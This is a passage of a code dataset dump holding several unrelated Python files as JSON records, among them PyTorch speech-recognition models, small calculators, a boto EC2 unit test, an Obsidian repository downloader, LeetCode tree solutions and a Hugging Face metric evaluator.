data.sort(key=get_price)\n print(data)\n high_purchase = data[-1]\n low_purchase = data[0]\n\n print(high_purchase['price'])\n print('{:,}'.format(float(low_purchase['price'])))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"hamanovich/py-10apps","sub_path":"09_real_estate (DOESNT WORK)/program.py","file_name":"program.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"11832382667","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torchaudio\n\n\ndef get_model(in_dim, out_dim, num_layers, hidden_dims, arch,\n kernel_sizes=None, strides=None, dilations=None, bidirectional=True, dropout=0, residual=False, **others):\n valid_archs = ['TDNN', 'RNN', 'LSTM', 'GRU', 'TDNN-LSTM', 'TDNN-MFCC']\n if arch not in valid_archs:\n raise ValueError('Supported models are: {} \\n'\n 'but given {}'.format(valid_archs, arch))\n if arch == 'TDNN':\n if not kernel_sizes or not dilations or not strides:\n raise ValueError(\n 'Please specify kernel sizes, strides and dilations for TDNN')\n model = TDNN(in_dim, out_dim, num_layers,\n hidden_dims, kernel_sizes, strides, dilations, dropout, residual)\n\n elif arch == 'TDNN-MFCC':\n if not kernel_sizes or not dilations or not strides:\n raise ValueError(\n 'Please specify kernel sizes, strides and dilations for TDNN')\n model = TDNN_MFCC(in_dim, out_dim, num_layers,\n hidden_dims, kernel_sizes, strides, dilations, dropout)\n\n elif arch == 'TDNN-LSTM':\n if not kernel_sizes or not dilations or not strides:\n raise ValueError(\n 'Please specify kernel sizes, strides and dilations for TDNN-LSTM')\n model = TDNNLSTM(in_dim, out_dim, num_layers, hidden_dims, kernel_sizes,\n strides, dilations, bidirectional, dropout, residual)\n else:\n # we simply use same hidden dim for all rnn layers\n hidden_dim = hidden_dims[0]\n model = RNN(in_dim, out_dim, num_layers, hidden_dim,\n arch, bidirectional, dropout)\n\n return model\n\n\nclass TDNNLSTM(nn.Module):\n def __init__(self, in_dim, out_dim, num_layers, hidden_dims, kernel_sizes, strides, dilations,\n bidirectional=False, dropout=0):\n super(TDNNLSTM, self).__init__()\n self.num_tdnn_layers = len(hidden_dims)\n self.num_lstm_layers = num_layers - len(hidden_dims)\n assert len(kernel_sizes) == self.num_tdnn_layers\n assert len(strides) == self.num_tdnn_layers\n assert len(dilations) == self.num_tdnn_layers\n self.in_dim = in_dim\n self.out_dim = out_dim\n self.dropout = dropout\n # set lstm hidden_dim to the num_channels of the last cnn layer\n self.lstm_dim = hidden_dims[-1]\n self.tdnn = nn.ModuleList([\n tdnn_bn_relu(\n in_dim if layer == 0 else hidden_dims[layer - 1],\n hidden_dims[layer], kernel_sizes[layer],\n strides[layer], dilations[layer],\n )\n for layer in range(self.num_tdnn_layers)\n ])\n self.num_directions = 2 if bidirectional else 1\n self.lstm = nn.LSTM(self.lstm_dim, self.lstm_dim, self.num_lstm_layers,\n batch_first=True, bidirectional=bidirectional,\n dropout=dropout)\n self.final_layer = nn.Linear(\n self.lstm_dim * self.num_directions, out_dim)\n\n def forward(self, x, x_lengths):\n assert len(x.size()) == 3 # x is of size (B, T, D)\n # turn x to (B, D, T) for tdnn/cnn input\n x = x.transpose(1, 2).contiguous()\n for i in range(len(self.tdnn)):\n # apply Tdnn\n x, x_lengths = self.tdnn[i](x, x_lengths)\n x = F.dropout(x, p=self.dropout, training=self.training)\n x = x.transpose(2, 1).contiguous() # turn it back to (B, T, D)\n bsz = x.size(0)\n state_size = self.num_directions * \\\n self.num_lstm_layers, bsz, self.lstm_dim\n h0, c0 = x.new_zeros(*state_size), x.new_zeros(*state_size)\n x = torch.nn.utils.rnn.pack_padded_sequence(\n x, x_lengths, batch_first=True) # (B, T, D)\n x, _ = self.lstm(x, (h0, c0))\n x, _ = torch.nn.utils.rnn.pad_packed_sequence(\n x, batch_first=True) # (B, T, D)\n x = self.final_layer(x)\n return x, x_lengths\n\n\nclass tdnn_bn_relu(nn.Module):\n def __init__(self, in_dim, out_dim, kernel_size, stride=1, dilation=1):\n super(tdnn_bn_relu, self).__init__()\n self.kernel_size = kernel_size\n self.stride = stride\n self.padding = dilation * (kernel_size - 1) // 2\n self.dilation = dilation\n self.tdnn = nn.Conv1d(in_dim, out_dim, kernel_size,\n stride=stride, padding=self.padding, dilation=dilation)\n self.bn = nn.BatchNorm1d(out_dim)\n self.relu = nn.ReLU(inplace=True)\n\n def output_lengths(self, in_lengths):\n out_lengths = (\n in_lengths + 2 * self.padding - self.dilation * (self.kernel_size - 1) +\n self.stride - 1\n ) // self.stride\n return out_lengths\n\n def forward(self, x, x_lengths):\n assert len(x.size()) == 3 # x is of size (N, F, T)\n x = self.tdnn(x)\n x = self.bn(x)\n x = self.relu(x)\n x_lengths = self.output_lengths(x_lengths)\n return x, x_lengths\n\n\nclass TDNN(nn.Module):\n def __init__(self, in_dim, out_dim, num_layers, hidden_dims, kernel_sizes, strides, dilations,\n dropout=0, residual=False):\n super(TDNN, self).__init__()\n assert len(hidden_dims) == num_layers\n assert len(kernel_sizes) == num_layers\n assert len(strides) == num_layers\n assert len(dilations) == num_layers\n self.dropout = dropout\n self.residual = residual\n self.num_layers = num_layers\n self.tdnn = nn.ModuleList([\n tdnn_bn_relu(\n in_dim if layer == 0 else hidden_dims[layer - 1],\n hidden_dims[layer], kernel_sizes[layer],\n strides[layer], dilations[layer],\n )\n for layer in range(num_layers)\n ])\n self.final_layer = nn.Linear(hidden_dims[-1], out_dim, True)\n\n def forward(self, x, x_lengths):\n assert len(x.size()) == 3 # x is of size (B, T, D)\n # turn x to (B, D, T) for tdnn/cnn input\n x = x.transpose(1, 2).contiguous()\n for i in range(len(self.tdnn)):\n # apply Tdnn\n if self.residual and i > 0: # residual starts from the 2nd layer\n prev_x = x\n x, x_lengths = self.tdnn[i](x, x_lengths)\n x = x + prev_x if (self.residual and i >\n 0 and x.size(2) == prev_x.size(2)) else x\n x = F.dropout(x, p=self.dropout, training=self.training)\n x = x.transpose(2, 1).contiguous() # turn it back to (B, T, D)\n x = self.final_layer(x)\n return x, x_lengths\n\n\nclass TDNN_MFCC(nn.Module):\n def __init__(self, in_dim, out_dim, num_layers, hidden_dims, kernel_sizes, strides, dilations, dropout=0):\n super(TDNN_MFCC, self).__init__()\n assert len(hidden_dims) == num_layers\n assert len(kernel_sizes) == num_layers\n assert len(strides) == num_layers\n assert len(dilations) == num_layers\n self.dropout = dropout\n self.num_layers = num_layers\n self.tdnn = nn.ModuleList([\n tdnn_bn_relu(\n in_dim if layer == 0 else hidden_dims[layer - 1],\n hidden_dims[layer], kernel_sizes[layer],\n strides[layer], dilations[layer],\n )\n for layer in range(num_layers)\n ])\n self.mfcc = torchaudio.transforms.MFCC()\n self.final_layer = nn.Linear(hidden_dims[-1], out_dim, True)\n\n def mfcc_output_lengths(self, in_lengths):\n hop_length = self.mfcc.MelSpectrogram.hop_length\n out_lengths = in_lengths // hop_length + 1\n return out_lengths\n\n def forward(self, x, x_lengths):\n assert len(x.size()) == 3 # x is of size (B, T, D)\n # turn x to (B, D, T) for tdnn/cnn input\n x = x.transpose(1, 2).contiguous()\n x = self.mfcc(x)\n x = x.squeeze(1) # x of size (B, D, T)\n x_lengths = self.mfcc_output_lengths(x_lengths)\n for i in range(len(self.tdnn)):\n # apply Tdnn\n x, x_lengths = self.tdnn[i](x, x_lengths)\n x = F.dropout(x, p=self.dropout, training=self.training)\n x = x.transpose(2, 1).contiguous() # turn it back to (B, T, D)\n x = self.final_layer(x)\n return x, x_lengths\n\n\nclass RNN(nn.Module):\n def __init__(self, in_dim, out_dim, num_layers, hidden_dim, rnn_type='LSTM', bidirectional=False, dropout=0):\n super(RNN, self).__init__()\n valid_rnn_types = ['LSTM', 'RNN', 'GRU']\n if rnn_type not in valid_rnn_types:\n raise ValueError(\"Only {0} types are supported but given {1}\".format(\n valid_rnn_types, rnn_type))\n else:\n self.rnn_type = rnn_type\n if rnn_type == 'LSTM':\n self.rnn_module = nn.LSTM\n if rnn_type == 'RNN':\n self.rnn_module = nn.RNN\n if rnn_type == 'GRU':\n self.rnn_module = nn.GRU\n self.in_dim = in_dim\n self.out_dim = out_dim\n self.num_layers = num_layers\n self.hidden_dim = hidden_dim\n self.num_directions = 2 if bidirectional else 1\n self.rnn_layer = self.rnn_module(self.in_dim, self.hidden_dim, self.num_layers,\n batch_first=True, bidirectional=bidirectional,\n dropout=dropout)\n self.final_layer = nn.Linear(hidden_dim * self.num_directions, out_dim)\n\n def forward(self, x, x_lengths):\n bsz = x.size(0)\n state_size = self.num_directions * \\\n self.num_layers, bsz, self.hidden_dim\n h0, c0 = x.new_zeros(*state_size), x.new_zeros(*state_size)\n if self.rnn_type == 'LSTM':\n h0 = (h0, c0)\n x = torch.nn.utils.rnn.pack_padded_sequence(\n x, x_lengths, batch_first=True, enforce_sorted=False) # (B, T, D)\n x, _ = self.rnn_layer(x, h0)\n x, _ = torch.nn.utils.rnn.pad_packed_sequence(\n x, batch_first=True) # (B, T, D)\n x = self.final_layer(x)\n return x, x_lengths\n","repo_name":"FAST-ASR/recipes","sub_path":"datasets/wsj/v0.9/ASR/src/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":10163,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"70965717513","text":"## Dashiell Wendt 2033998\r\n\r\nprint(f\"Birthday Calculator\")\r\nprint(f\"Current day\")\r\ncurrmonth = int(input(\"Month: \"))\r\ncurrday = int(input(\"Day: \"))\r\ncurryear = int(input(\"Year: \"))\r\nprint(f\"Birthday\")\r\nbirtmonth = int(input(\"Month: \"))\r\nbirtday = int(input(\"Day: \"))\r\nbirtyear = int(input(\"Year: \"))\r\nyearsold = curryear - birtyear - 1\r\nif(currmonth > birtmonth):\r\n yearsold += 1\r\nelif(currmonth == birtmonth):\r\n if(currday >= birtday):\r\n yearsold += 1\r\n if(currday == birtday):\r\n print(f\"Happy Birthday!\")\r\nprint(f\"You are {yearsold} years old.\")","repo_name":"dashwhen/cis2334","sub_path":"Homework1/Problem1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"42629732573","text":"from typing import Collection\n\nfrom db_models import AreaDBModel, UnitAreaStatsDBModel\nfrom handlers.db import BaseDBHandler\nfrom handlers.db.serialization import BaseDBSchema\n\n\nclass UnitAreaStatsDBSchema(BaseDBSchema):\n class Meta(BaseDBSchema.Meta):\n model = UnitAreaStatsDBModel\n\n\nclass UnitAreaStatsDBHandler(BaseDBHandler):\n schema = UnitAreaStatsDBSchema()\n model = UnitAreaStatsDBModel\n\n @classmethod\n def unit_area_stats_with_area_types(cls, run_ids: Collection[str]):\n with cls.begin_session(readonly=True) as s:\n unit_area_stats = (\n s.query(cls.model).filter(cls.model.run_id.in_(run_ids)).all()\n )\n\n area_types = {\n a.id: a.area_type\n for a in s.query(AreaDBModel.id, AreaDBModel.area_type)\n .filter(AreaDBModel.id.in_({s.area_id for s in unit_area_stats}))\n .all()\n }\n\n return [\n {\n \"run_id\": s.run_id,\n \"unit_id\": s.unit_id,\n \"area_id\": s.area_id,\n \"dimension\": s.dimension,\n \"min\": s.min,\n \"max\": s.max,\n \"mean\": s.mean,\n \"stddev\": s.stddev,\n \"count\": s.count,\n \"area_type\": area_types[s.area_id].name,\n }\n for s in unit_area_stats\n ]\n","repo_name":"Archilyse/Archilyse","sub_path":"handlers/handlers/db/unit_area_stats_handler.py","file_name":"unit_area_stats_handler.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"27"} +{"seq_id":"73629644871","text":"#!/usr/bin/env python\n\nfrom tests.compat import mock, unittest\n\nfrom boto.ec2.connection import EC2Connection\n\nINSTANCE_STATUS_RESPONSE = br\"\"\"\n\n 3be1508e-c444-4fef-89cc-0b1223c4f02fEXAMPLE\n page-2\n \n\n\"\"\"\n\n\nclass TestInstanceStatusResponseParsing(unittest.TestCase):\n def test_next_token(self):\n ec2 = EC2Connection(aws_access_key_id='aws_access_key_id',\n aws_secret_access_key='aws_secret_access_key')\n mock_response = mock.Mock()\n mock_response.read.return_value = INSTANCE_STATUS_RESPONSE\n mock_response.status = 200\n ec2.make_request = mock.Mock(return_value=mock_response)\n all_statuses = ec2.get_all_instance_status()\n self.assertNotIn('IncludeAllInstances', ec2.make_request.call_args[0][1])\n self.assertEqual(all_statuses.next_token, 'page-2')\n\n def test_include_all_instances(self):\n ec2 = EC2Connection(aws_access_key_id='aws_access_key_id',\n aws_secret_access_key='aws_secret_access_key')\n mock_response = mock.Mock()\n mock_response.read.return_value = INSTANCE_STATUS_RESPONSE\n mock_response.status = 200\n ec2.make_request = mock.Mock(return_value=mock_response)\n all_statuses = ec2.get_all_instance_status(include_all_instances=True)\n self.assertIn('IncludeAllInstances', ec2.make_request.call_args[0][1])\n self.assertEqual('true', ec2.make_request.call_args[0][1]['IncludeAllInstances'])\n self.assertEqual(all_statuses.next_token, 'page-2')\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"boto/boto","sub_path":"tests/unit/ec2/test_instancestatus.py","file_name":"test_instancestatus.py","file_ext":"py","file_size_in_byte":1811,"program_lang":"python","lang":"en","doc_type":"code","stars":6486,"dataset":"github-code","pt":"27"} +{"seq_id":"14438298549","text":"from __future__ import annotations\n\nimport toolcli\n\nfrom ctc import evm\nfrom ctc import spec\n\n\ndef get_command_spec() -> toolcli.CommandSpec:\n return {\n 'f': checksum_command,\n 'help': 'compute checksum of address',\n 'args': [\n {'name': 'address', 'help': 'address to get checksum of'},\n ],\n 'examples': [\n '0xd8da6bf26964af9d7eed9e03e53415d37aa96045',\n ],\n }\n\n\ndef checksum_command(address: spec.Address) -> None:\n print(evm.get_address_checksum(address))\n","repo_name":"checkthechain/checkthechain","sub_path":"src/ctc/cli/commands/compute/checksum_command.py","file_name":"checksum_command.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":799,"dataset":"github-code","pt":"27"} +{"seq_id":"38215854248","text":"import os\nimport traceback\n\n# [Ficha 01 - Ex. 04] - Calcula o IMC dado o peso e a altura da pessoa\n\ntry:\n isNumberCorrect1, isNumberCorrect2 = False, False\n while not isNumberCorrect1:\n try:\n altura = float(str(input(\"Introduza a altura em metros: \")).replace(\",\", \".\"))\n if altura >= 1.20 and altura <= 2.20:\n isNumberCorrect1 = True\n except:\n continue\n while not isNumberCorrect2:\n try:\n peso = float(str(input(\"Introduza o peso em kilogramas: \")).replace(\",\", \".\"))\n if peso >= 35 and peso <= 350:\n isNumberCorrect2 = True\n except:\n continue\n print(\"\\nIMC: %.2f\" %float(peso / (altura*altura)))\nexcept Exception as e:\n print(str(e))\n traceback.print_exc()\n\nos.system(\"pause\")\n","repo_name":"Darwin1337/tsiw-aed","sub_path":"AED - Ficha 01/Ex04.py","file_name":"Ex04.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"22535494448","text":"#!/usr/bin/env python3\n\nimport os\nimport sys\nimport argparse\nimport subprocess\n\nfrom utils import (\n get_json_from_github\n)\nfrom utils import PLUGINS_JSON_FILE, THEMES_JSON_FILE\nfrom dirutils import use_directory, readable_dir\n\n\nclass DownloaderOptions:\n def __init__(self):\n self.parser = self.make_parser()\n self.args = None\n\n def make_parser(self):\n parser = argparse.ArgumentParser(\n description=\"Clone repos included in the obsidian-releases repo, \"\n \"to provide a body of example plugins and CSS themes.\"\n )\n parser.add_argument('-o', '--output_directory', default='.', type=readable_dir,\n help='The directory where repos will be downloaded. Must already exist. '\n '(default: %(default)s which means \"current working directory\")'\n )\n\n parser.add_argument('-l', '--limit', type=int, default=0,\n help='Limit the number of plugin and theme repos that will be downloaded. '\n 'This is useful when testing the script. '\n '0 (zero) means \"no limit\". '\n 'Note: the count currently includes any repos already downloaded.'\n '(default: %(default)s)')\n\n parser.add_argument('-n', '--dry-run', action=\"store_true\",\n help='Print out the commands to be executed, but do no run them. '\n 'This is useful for testing. '\n 'Note: it does not print the directory-creation commands, '\n 'just the git ones')\n\n parser.add_argument('-t', '--type',\n default='all',\n const='all',\n nargs='?',\n choices=['plugins', 'themes', 'all'],\n help='The type of repositories to download: plugins, themes or both. '\n '(default: %(default)s)')\n\n parser.add_argument('--group-by-user', dest='group_by_user', action='store_true',\n help='Put each repository in a sub-folder named for the GitHub user. '\n 'For example, the plugin \"https://github.com/phibr0/obsidian-tabout\" would be placed '\n 'in \"plugins/phibr0/obsidian-tabout\"')\n parser.add_argument('--no-group-by-user', dest='group_by_user', action='store_false',\n help='Put each repository in the same folder, prefixed by the user name. '\n 'This is the default behaviour. '\n 'For example, the plugin \"https://github.com/phibr0/obsidian-tabout\" would be placed '\n 'in \"plugins/phibr0-obsidian-tabout\"')\n parser.set_defaults(group_by_user=False)\n\n return parser\n\n def parse_args(self, argv):\n self.args = self.parser.parse_args(argv)\n\n def limit(self):\n return self.args.limit\n\n def dry_run(self):\n return self.args.dry_run\n\n def need_to_download_type(self, type):\n return self.args.type in [\"all\", type]\n\n def root_output_directory(self):\n return self.args.output_directory\n\n def repo_output_directory(self, user):\n if self.args.group_by_user:\n return user\n else:\n return '.'\n\n def repo_output_name(self, user, repo):\n if self.args.group_by_user:\n return repo\n else:\n # Prefix with username, in case there are any duplicated repo names\n return f\"{user}-{repo}\"\n\n\nclass Downloader:\n def __init__(self, options):\n self.options = options\n self.errors = \"\"\n\n def download(self):\n with use_directory(self.options.root_output_directory(), create_if_missing=False):\n print(f\"Working directory: {os.getcwd()}\")\n self.process_released_plugins()\n self.process_released_themes()\n\n self.print_any_errors()\n\n def process_released_plugins(self):\n self.process_released_repos(\"plugins\", PLUGINS_JSON_FILE)\n\n def process_released_themes(self):\n self.process_released_repos(\"themes\", THEMES_JSON_FILE)\n\n def process_released_repos(self, type, json_file):\n if not self.options.need_to_download_type(type):\n return\n\n print(f\"-----\\nProcessing {type}....\\n\")\n with use_directory(type, create_if_missing=True):\n plugin_list = get_json_from_github(json_file)\n sorted_list = sorted(plugin_list, key=lambda d: d['repo'].lower())\n self.clone_or_update_repos(sorted_list)\n\n def clone_or_update_repos(self, plugin_list):\n count = 0\n limit = self.options.limit()\n for plugin in plugin_list:\n self.clone_or_update_repo(plugin)\n count += 1\n if limit > 0 and count >= limit:\n print(\"Maximum number of new repos exceeded. Stopping.\")\n return\n\n def clone_or_update_repo(self, plugin):\n repo = plugin.get(\"repo\")\n branch = plugin.get(\"branch\", \"master\")\n user, repo_name = repo.split(\"/\")\n # if user != 'Slowbad':\n # print('Skipping user')\n # return\n directory_for_repo = self.options.repo_output_directory(user)\n with use_directory(directory_for_repo, create_if_missing=True):\n repo_output_name = self.options.repo_output_name(user, repo_name)\n if not os.path.isdir(repo_output_name):\n command = self.get_download_command(repo, repo_output_name)\n self.run_or_log(\"cloning\", command, repo)\n else:\n with use_directory(repo_output_name, create_if_missing=False):\n command = self.get_clone_command()\n self.run_or_log(f\"updating\", command, repo)\n\n def run_or_log(self, verb, command, repo):\n message = f\"{verb} {repo}\"\n print(message)\n if self.options.dry_run():\n self.log_dry_run(command)\n else:\n result = subprocess.run(command, shell=True, check=False, capture_output=True, text=True)\n if result.returncode != 0:\n self.log_error(result, message, command)\n\n def log_dry_run(self, command):\n print(f'Dry run mode: {command}')\n\n def get_download_command(self, repo, repo_output_name):\n url = f'https://github.com/{repo}'\n print(url)\n command = f\"git clone --quiet {url}.git {repo_output_name}\"\n return command\n\n def get_clone_command(self):\n command = 'git pull --quiet'\n return command\n\n def log_error(self, result, message2, command):\n message = f\"\"\"{message2}\ncommand: {command}\nin: {os.getcwd()}\nexit code: {result.returncode}\nstdout: {result.stdout}\nstderr: {result.stderr}\n-------------------------------------------------------------------------------\n\"\"\"\n print(message)\n self.errors += message\n\n def print_any_errors(self):\n if self.errors != \"\":\n print(\"The following errors occurred:\")\n print(self.errors)\n\n\ndef download_repos(argv=sys.argv[1:]):\n options = DownloaderOptions()\n options.parse_args(argv)\n\n downloader = Downloader(options)\n downloader.download()\n\n\nif __name__ == \"__main__\":\n download_repos()\n","repo_name":"claremacrae/obsidian-repos-downloader","sub_path":"obsidian-repos-downloader.py","file_name":"obsidian-repos-downloader.py","file_ext":"py","file_size_in_byte":7562,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"27"} +{"seq_id":"71641877833","text":"__source__ = 'https://leetcode.com/problems/invert-binary-tree/'\n# https://github.com/kamyu104/LeetCode/blob/master/Python/invert-binary-tree.py\n# Time: O(n)\n# Space: O(h)\n#\n# Description: Leetcode # 226. Invert Binary Tree\n#\n# Invert a binary tree.\n#\n# 4\n# / \\\n# 2 7\n# / \\ / \\\n# 1 3 6 9\n# to\n# 4\n# / \\\n# 7 2\n# / \\ / \\\n# 9 6 3 1\n#\n#\n# Trivia:\n# This problem was inspired by this original tweet by Max Howell:\n# Google: 90% of our engineers use the software you wrote (Homebrew),\n# but you can't invert a binary tree on a whiteboard so fuck off.\n#\n# Related Topics\n# Tree\n#\n# Time: O(n)\n# Space: O(w), w is the max number of the nodes of the levels.\n# BFS solution.\nimport unittest\nimport collections\nclass Queue:\n def __init__(self):\n self.data = collections.deque()\n\n def push(self, x):\n self.data.append(x)\n\n def peek(self):\n return self.data[0]\n\n def pop(self):\n return self.data.popleft()\n\n def size(self):\n return len(self.data)\n\n def empty(self):\n return len(self.data) == 0\n\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass Solution:\n # @param {TreeNode} root\n # @return {TreeNode}\n def invertTree(self, root):\n if root is not None:\n nodes = Queue()\n nodes.push(root)\n while not nodes.empty():\n node = nodes.pop()\n node.left, node.right = node.right, node.left\n if node.left is not None:\n nodes.push(node.left)\n if node.right is not None:\n nodes.push(node.right)\n return root\n\n# Time: O(n)\n# Space: O(h)\n# Stack solution.\nclass Solution2:\n # @param {TreeNode} root\n # @return {TreeNode}\n def invertTree(self, root):\n if root is not None:\n nodes = []\n nodes.append(root)\n while nodes:\n node = nodes.pop()\n node.left, node.right = node.right, node.left\n if node.left is not None:\n nodes.append(node.left)\n if node.right is not None:\n nodes.append(node.right)\n return root\n\n# Time: O(n)\n# Space: O(h)\n# DFS, Recursive solution.\nclass Solution3:\n # @param {TreeNode} root\n # @return {TreeNode}\n def invertTree(self, root):\n if root is not None:\n root.left, root.right = self.invertTree(root.right), self.invertTree(root.left)\n return root\n\nclass TestMethods(unittest.TestCase):\n def test_Local(self):\n self.assertEqual(1, 1)\n\nif __name__ == '__main__':\n unittest.main()\n\nJava = '''\nThought: https://leetcode.com/problems/invert-binary-tree/solution/\n\n/**\n * Definition for a binary tree node.\n * public class TreeNode {\n * int val;\n * TreeNode left;\n * TreeNode right;\n * TreeNode(int x) { val = x; }\n * }\n */\n\npublic class Solution {\n //DFS3\n # 0ms 100%\n public TreeNode invertTree(TreeNode root) {\n if (root != null) {\n TreeNode tmp = root.left;\n root.left = root.right;\n root.right = tmp;\n invertTree(root.left);\n invertTree(root.right);\n }\n return root;\n }\n //DFS1\n # 0ms 100%\n public TreeNode invertTree1(TreeNode root) {\n if (root == null) return null;\n //TreeNode tmp = root.left;\n TreeNode left = root.left;\n TreeNode right = root.right;\n root.left = invertTree(right);\n root.right = invertTree(left);\n return root;\n }\n //DFS2\n # 0ms 100%\n public TreeNode invertTree2(TreeNode root) {\n if (root == null) { return null;}\n TreeNode right = invertTree(root.right);\n TreeNode left = invertTree(root.left);\n root.left = right;\n root.right = left;\n return root;\n }\n\n //BFS1\n # 0ms 100%\n public TreeNode invertTreeBFS(TreeNode root) {\n if (root == null) return null;\n Queue queue = new LinkedList();\n queue.add(root);\n while (!queue.isEmpty()) {\n TreeNode current = queue.poll();\n TreeNode temp = current.left;\n current.left = current.right;\n current.right = temp;\n if (current.left != null) queue.add(current.left);\n if (current.right != null) queue.add(current.right);\n }\n return root;\n }\n}\n'''","repo_name":"JulyKikuAkita/PythonPrac","sub_path":"cs15211/InvertBinaryTree.py","file_name":"InvertBinaryTree.py","file_ext":"py","file_size_in_byte":4540,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"2008018366","text":"#!/usr/bin/env python3\n\nimport argparse\nfrom pathlib import Path\nfrom typing import Any, Dict, List\nimport json\nimport os\n\nimport evaluate\nfrom evaluate.utils.file_utils import DownloadConfig\nimport pandas as pd\n\nOFFLINE = os.environ.get(\"OFFLINE\", False)\nif OFFLINE:\n evaluate.config.HF_EVALUATE_OFFLINE = True\n\n\ndef to_prototext(m: List[Dict[str, Any]], upper_k: str = \"\") -> str:\n ret = \"\"\n\n def _to_prototext(d: Dict[str, Any], upper_k: str = \"\") -> str:\n ret = \"\"\n for k, v in d.items():\n new_k = upper_k\n if not new_k:\n new_k = k\n elif not new_k.endswith(k):\n new_k = upper_k + \"_\" + k\n if isinstance(v, dict):\n ret += _to_prototext(v, upper_k=new_k)\n else:\n ret += (\n 'measure{\\n key: \"'\n + str(new_k.replace(\"_\", \" \").title())\n + '\"\\n value: \"'\n + str(v)\n + '\"\\n}\\n'\n )\n return ret\n\n for d in m:\n ret += _to_prototext(d, upper_k=upper_k)\n\n return ret\n\n\ndef load_data(path: Path, data_format: str) -> List:\n if data_format == \"csv\":\n return pd.read_csv(path, sep=\",\").iloc[:, -1].tolist()\n if data_format == \"tsv\":\n return pd.read_csv(path, sep=\"\\t\").iloc[:, -1].tolist()\n if data_format in (\"IOB1\", \"IOB2\", \"IOE1\", \"IOE2\", \"IOBES\", \"BILOU\"):\n data = path.read_text().strip().split(\"\\n\\n\")\n data = [x.split(\"\\n\") for x in data]\n return data\n else:\n raise ValueError(\"Unknown data format: \" + data_format)\n\n\ndef evaluate_metrics(\n predictions: List, references: List, metrics: List[str], **kwargs\n) -> List[Dict[str, Any]]:\n results = []\n\n download_config = None\n if OFFLINE:\n download_config = DownloadConfig(local_files_only=True)\n\n for metric in metrics:\n results.append(\n evaluate.load(metric, download_config=download_config).compute(\n predictions=predictions, references=references, **kwargs\n )\n )\n\n return results\n\n\ndef main(args=None):\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"--metrics\", type=str, nargs=\"+\", required=True)\n parser.add_argument(\n \"--data-format\",\n type=str,\n choices=[\"csv\", \"tsv\", \"IOB1\", \"IOB2\", \"IOE1\", \"IOE2\", \"IOBES\", \"BILOU\"],\n required=True,\n )\n parser.add_argument(\"--predictions\", type=Path, required=True)\n parser.add_argument(\"--references\", type=Path, required=True)\n parser.add_argument(\"--output-prototext\", type=Path, required=True)\n parser.add_argument(\"--kwargs\", type=json.loads, default=None)\n\n args = parser.parse_args(args)\n\n kwargs = args.kwargs\n if kwargs is None:\n kwargs = {}\n\n predictions = load_data(args.predictions, args.data_format)\n references = load_data(args.references, args.data_format)\n results = evaluate_metrics(predictions, references, args.metrics, **kwargs)\n\n with open(args.output_prototext, \"w\") as f:\n f.write(to_prototext(results).strip())\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"tira-io/hf-evaluator","sub_path":"hf_evaluator/evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":3162,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"75004430150","text":"import os\nimport pickle\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef load_data(filename):\n \"\"\"Load generic pickle file\"\"\"\n with open(filename, 'rb') as f:\n data = pickle.load(f)\n\n return data\n\n\ndef save_pickle(file_obj, filename):\n \"\"\"Write as pickle to file\"\"\"\n with open(filename, 'wb') as f:\n pickle.dump(file_obj, f)\n\n\ndef generate_posterior_histograms(fit_obj, param_list, prefix=''):\n \"\"\"Create and save marginal histograms for each parameter from sampled posterior\"\"\"\n n_params = len(param_list)\n\n fig, ax = plt.subplots(n_params, 1, figsize=(8, 12))\n\n for j in range(n_params):\n ax[j].hist(fit_obj[param_list[j]].flatten().tolist(), bins=50)\n ax[j].set_xlabel(param_list[j])\n plt.tight_layout()\n outfile = prefix + 'sampled_histogram.png'\n plt.savefig(os.path.join('figs', outfile))\n plt.show(); plt.close()\n\n\ndef generate_traceplots(fit_obj, param_list, prefix=''):\n \"\"\"Create and save traceplots for each parameter from sampling algorithm\"\"\"\n n_params = len(param_list)\n n_samples = len(fit_obj[param_list[0]][0])\n\n fig, ax = plt.subplots(n_params, 1, sharex=True, figsize=(8, 11))\n\n for j in range(n_params):\n ax[j].scatter(np.linspace(0, n_samples, num=n_samples), fit_obj[param_list[j]], s=5)\n ax[j].set_ylabel(param_list[j])\n plt.xlabel('number of samples')\n plt.tight_layout()\n outfile = prefix + 'sampled_traceplot.png'\n plt.savefig(os.path.join('figs', outfile))\n plt.show(); plt.close()\n","repo_name":"jelc53/lib-capacity-fade","sub_path":"source/utils/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"10630815972","text":"import cv2\nimport numpy as np\nimport freenect\nimport importlib.util\nspec1 = importlib.util.spec_from_file_location(\"frame_convert2\", \"/Users/mitch/Documents/University/Project/Project GitLab/prototypes/Kinect Basics/libfreenect/wrappers/python/frame_convert2.py\")\nframe_convert2 = importlib.util.module_from_spec(spec1)\nspec1.loader.exec_module(frame_convert2)\n\ntop_left_coordinates = [50,50]\nwidth_cube = 100\ncube_depth = 0 # z axis = 0\n\n\ndef moveCube(x_coord, y_coord):\n global 